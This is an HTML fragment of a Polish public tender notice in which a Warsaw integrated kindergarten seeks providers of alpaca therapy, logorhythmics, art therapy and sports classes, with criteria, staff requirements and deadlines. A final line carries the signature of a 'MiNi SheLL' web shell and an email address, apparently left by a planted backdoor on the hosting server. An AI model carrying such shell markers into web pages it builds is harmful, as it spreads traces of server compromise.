kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.1.	Przedmiotem zamówienia jest: <br/>Opis Przedmiotu Zamówienia i termin jego realizacji<br/>1)	Zakres rzeczowy przedmiotu zamówienia obejmuje w szczególności przeprowadzenie zajęć dodatkowych w Przedszkolu z Oddziałami Integracyjnymi Nr 430 w Warszawie, ul. Ceramiczna 9a, określonych szczegółowo w Opisie Przedmiotu Zamówienia stanowiącym załącznik nr 1 do wzoru umowy.<br/>2)	Wykonawca zobowiązuje się do wykonania przedmiotu zamówienia z najwyższą starannością, zgodnie z obowiązującymi przepisami, normami oraz do zapewnienia najwyższej jakości, prac towarzyszących usłudze.<br/>3)	Wykonawca nie może powierzyć w całości ani w części wykonania przedmiotu zamówienia osobom trzecim bez uprzedniej pisemnej zgody Zamawiającego. Wykonawca ponosi wobec Zamawiającego pełną odpowiedzialność za prace, które wykonuje przy pomocy podwykonawców. Wykonawca zobowiązuje się do zapłaty podwykonawcom wynagrodzenia na podstawie łączącego ich stosunku prawnego.<br/>Szczegółowy opis przedmiotu zamówienia zawiera wzór umowy (zał nr 8 do SWZ) w tym Opis przedmiotu zamówienia (zał nr 1 do wzoru umowy/załącznik nr 5 do SWZ).<br/>2.2.	Prawo opcji<br/>Zgodnie z art. 441 ustawy Zamawiający nie przewiduje skorzystania z prawa opcji.<br/>2.3	Wymagania w zakresie polisy ubezpieczeniowej<br/>Zamawiający wymaga, aby w całym okresie realizacji zamówienia osoby realizujące zamówienie były ubezpieczone od następstw nieszczęśliwych wypadków. Zamawiający wymaga od Wykonawcy, przedłożenia przed podpisaniem umowy polisy ubezpieczenia lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony zgodnie z wymogami wzoru umowy.<br/>2.4.	Wspólny Słownik Zamówień CPV<br/>Główny kod CPV: 80000000-4 Usługi edukacyjne i szkoleniowe<br/>2.5.	Termin realizacji zamówienia.<br/>Termin wykonania zamówienia: od daty podpisania umowy przez okres 12 miesięcy. <br/>Zajęcia będą prowadzone z wyłączeniem okresu wakacyjnego realizowanego w placówkach nieferyjnych na podstawie Rozporządzenia Ministra Edukacji Narodowej z dnia 17 marca 2017 r. w sprawie szczegółowej organizacji publicznych szkół i publicznych przedszkoli (Dz.U. z 2017r., poz. 649 ze zm.). Realizacja zajęć będzie się odbywać od poniedziałku do piątku w godzinach ustalonych z Dyrektorem przedszkola zgodnie <br/>z zatwierdzonym harmonogramem. Szczegółowy Harmonogram zajęć (stanowiący załącznik nr 5 do umowy) zostanie ustalony przed podpisaniem umowy z Wykonawcą. Zajęcia będą odbywać się poza godzinami podstawy programowej.<br/>Za „godzinę” rozumie się 45 minut przeprowadzonych zajęć dodatkowych.<br/>Szczegółowe warunki realizacji zamówienia zawiera wzór umowy.<br/>2.6.	Wartość zamówienia<br/>Zamawiający nie podaje na tym etapie kwoty na sfinansowanie zamówienia.<br/>2.7.	Gwarancja jakości<br/>Nie dotyczy.<br/>2.8.	Dodatkowe obowiązki Wykonawcy <br/>Zamawiający w przedmiotowym postępowaniu nie stosuje klauzuli społecznej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3.3.4.	Warunki dotyczące zdolności technicznej lub zawodowej:<br/>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia: <br/>a.	Część 1 - przeprowadzenie zajęć terapii z alpakami w Przedszkolu z Oddziałami Integracyjnymi Nr 430 <br/>w Warszawie, ul. Ceramiczna 9a w ramach projektu „Podróż poza horyzonty - Przedszkole z Oddziałami Integracyjnymi 430”<br/>•	Wykonawca dysponuje lub będzie dysponował minimum jedną (1) osobą niefigurującą w Rejestrze Sprawców Przestępstw na Tle Seksualnym z dostępem ograniczonym, która będzie prowadziła zajęcia w grupie z alpakoterapii, posiadającą specjalistyczne przygotowanie w zakresie prowadzenia zajęć z terapii z alpakami i minimum 150 godzin doświadczenia w prowadzeniu zajęć z terapii z alpakami. <br/>•	Wykonawca dysponuje lub będzie dysponował minimum jedną (1) pełnoletnią osobą niefigurującą w Rejestrze Sprawców Przestępstw na Tle Seksualnym z dostępem ograniczonym, która będzie pełniła funkcję asystenta osoby prowadzącej zajęcia.<br/>b.	Część 2 - przeprowadzenie zajęć logorytmiki w Przedszkolu z Oddziałami Integracyjnymi Nr 430 w Warszawie, ul. Ceramiczna 9a w ramach projektu „Podróż poza horyzonty - Przedszkole z Oddziałami Integracyjnymi 430”<br/>•	Wykonawca dysponuje lub będzie dysponował minimum jedną (1) osobą niefigurującą w Rejestrze Sprawców Przestępstw na Tle Seksualnym z dostępem ograniczonym, która będzie prowadziła zajęcia w grupie z logorytmiki, posiadającą specjalistyczne przygotowanie w zakresie prowadzenia zajęć z logorytmiki i minimum 150 godzin doświadczenia w prowadzeniu zajęć z logorytmiki.<br/>•	Wykonawca dysponuje lub będzie dysponował minimum jedną (1) pełnoletnią osobą niefigurującą <br/>w Rejestrze Sprawców Przestępstw na Tle Seksualnym z dostępem ograniczonym, która będzie pełniła funkcję asystenta osoby prowadzącej zajęcia.<br/>c.	Część 3 - przeprowadzenie zajęć artterapii w Przedszkolu z Oddziałami Integracyjnymi Nr 430 w Warszawie, ul. Ceramiczna 9a w ramach projektu „Podróż poza horyzonty - Przedszkole z Oddziałami Integracyjnymi 430.<br/>•	Wykonawca dysponuje lub będzie dysponował minimum jedną (1) osobą niefigurującą w Rejestrze Sprawców Przestępstw na Tle Seksualnym z dostępem ograniczonym, która będzie prowadziła zajęcia w grupie z artterapii, która posiada specjalistyczne przygotowanie w zakresie prowadzenia zajęć z artterapii i minimum 150 godzin doświadczenia w prowadzeniu zajęć z artterapii.<br/>•	Wykonawca dysponuje lub będzie dysponował minimum jedną (1) pełnoletnią osobą niefigurującą <br/>w Rejestrze Sprawców Przestępstw na Tle Seksualnym z dostępem ograniczonym, która będzie pełniła funkcję asystenta osoby prowadzącej zajęcia.<br/>d.	Część 4 - przeprowadzenie zabaw sportowych usprawniających koordynację wzrokowo – ruchową w Przedszkolu z Oddziałami Integracyjnymi Nr 430 w Warszawie, ul. Ceramiczna 9a w ramach projektu „Podróż poza horyzonty - Przedszkole z Oddziałami Integracyjnymi 430”<br/>•	Wykonawca dysponuje lub będzie dysponował minimum jedną (1) osobą niefigurującą w Rejestrze Sprawców Przestępstw na Tle Seksualnym z dostępem ograniczonym, która będzie prowadziła zajęcia w grupie z zabaw sportowych usprawniających koordynację wzrokowo – ruchową, która jest instruktorem sportu i posiadaminimum 150 godzin doświadczenia w prowadzeniu zajęć z zabaw sportowych usprawniających koordynację wzrokowo – ruchową.<br/>•	Wykonawca dysponuje lub będzie dysponował minimum jedną (1) pełnoletnią osobą niefigurującą <br/>w Rejestrze Sprawców Przestępstw na Tle Seksualnym z dostępem ograniczonym, która będzie pełniła funkcję asystenta osoby prowadzącej zajęcia.<br/><br/>UWAGA: W stosunku do każdej z części zamówienia, za „godzinę” rozumie się 45 minut przeprowadzonych zajęć dodatkowych.<br/>W przypadku wykonawców wspólnie ubiegających się o zamówienie, wykonawcy muszą wykazać, że powyższy warunek spełniają wspólnie (łącznie) lub samodzielnie lub polegając na zasobach innych podmiotów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">3.4.1.	Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie <br/>o braku podstaw do wykluczenia z postępowania – zgodnie z załącznikiem nr 2 do SWZ. <br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców odrębne oświadczenie składa każdy w Wykonawców wspólnie ubiegających się o zamówienie. <br/>W przypadku powoływania się na podmioty trzecie w celu spełnienia warunków udziału w postępowaniu - oświadczenie składają także podmioty trzecie.<br/>Oświadczenie należy sporządzić w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>Informacje zawarte w oświadczeniu, stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3.4.2.	Zamawiający, na podstawie art. 274 ust. 1 ustawy pzp, wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych na potwierdzenie braku podstaw do wykluczenia z postępowania i spełnienia warunków udziału w postępowaniu:<br/>	aktualnego na dzień złożenia oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym jest mowa w pkt 3.4.1 SWZ w zakresie art. 108 ust.1 pkt 3 i pkt 6 ustawy pzp – załącznik 2a do SWZ,<br/>	- Informacji z Krajowego rejestru Karnego w zakresie okoliczności wskazanych w art. 108 ust. 1 pkt 1, 2, 4 ustawy pzp – sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem,<br/>	aktualnego na dzień złożenia oświadczenia o braku przynależności do grupy kapitałowej – zgodnie z art. 108 ust 1 pkt 5 ustawy pzp – załącznik nr 9 do SWZ,<br/>	wykaz osób – załącznik 10 do SWZ.<br/>Dokumenty muszą być sporządzone w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3.4.1.	Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie <br/>o braku podstaw do wykluczenia z postępowania – zgodnie z załącznikiem nr 2 do SWZ. <br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców odrębne oświadczenie składa każdy w Wykonawców wspólnie ubiegających się o zamówienie. <br/>W przypadku powoływania się na podmioty trzecie w celu spełnienia warunków udziału w postępowaniu - oświadczenie składają także podmioty trzecie.<br/>Oświadczenie należy sporządzić w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>Informacje zawarte w oświadczeniu, stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3.4.2.	Zamawiający, na podstawie art. 274 ust. 1 ustawy pzp, wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych na potwierdzenie braku podstaw do wykluczenia z postępowania i spełnienia warunków udziału w postępowaniu:<br/>	aktualnego na dzień złożenia oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym jest mowa w pkt 3.4.1 SWZ w zakresie art. 108 ust.1 pkt 3 i pkt 6 ustawy pzp – załącznik 2a do SWZ,<br/>	- Informacji z Krajowego rejestru Karnego w zakresie okoliczności wskazanych w art. 108 ust. 1 pkt 1, 2, 4 ustawy pzp – sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem,<br/>	aktualnego na dzień złożenia oświadczenia o braku przynależności do grupy kapitałowej – zgodnie z art. 108 ust 1 pkt 5 ustawy pzp – załącznik nr 9 do SWZ,<br/>	wykaz osób – załącznik 10 do SWZ.<br/>Dokumenty muszą być sporządzone w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 3.2.	Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> zgodnie z pkt 3 SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> zgodnie z pkt 3.7 i 3.5. SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zgodnie ze wzorem umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-02 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.um.warszawa.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-02 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zajęcia będą prowadzone z wyłączeniem okresu wakacyjnego realizowanego w placówkach nieferyjnych na podstawie Rozporządzenia Ministra Edukacji Narodowej z dnia 17 marca 2017 r. w sprawie szczegółowej organizacji publicznych szkół i publicznych przedszkoli (Dz.U. z 2017r., poz. 649 ze zm.). Realizacja zajęć będzie się odbywać od poniedziałku do piątku w godzinach ustalonych z Dyrektorem przedszkola zgodnie <br/>z zatwierdzonym harmonogramem. Szczegółowy Harmonogram zajęć (stanowiący załącznik nr 5 do umowy) zostanie ustalony przed podpisaniem umowy z Wykonawcą. Zajęcia będą odbywać się poza godzinami podstawy programowej.

Creat By MiNi SheLL
Email: jattceo@gmail.com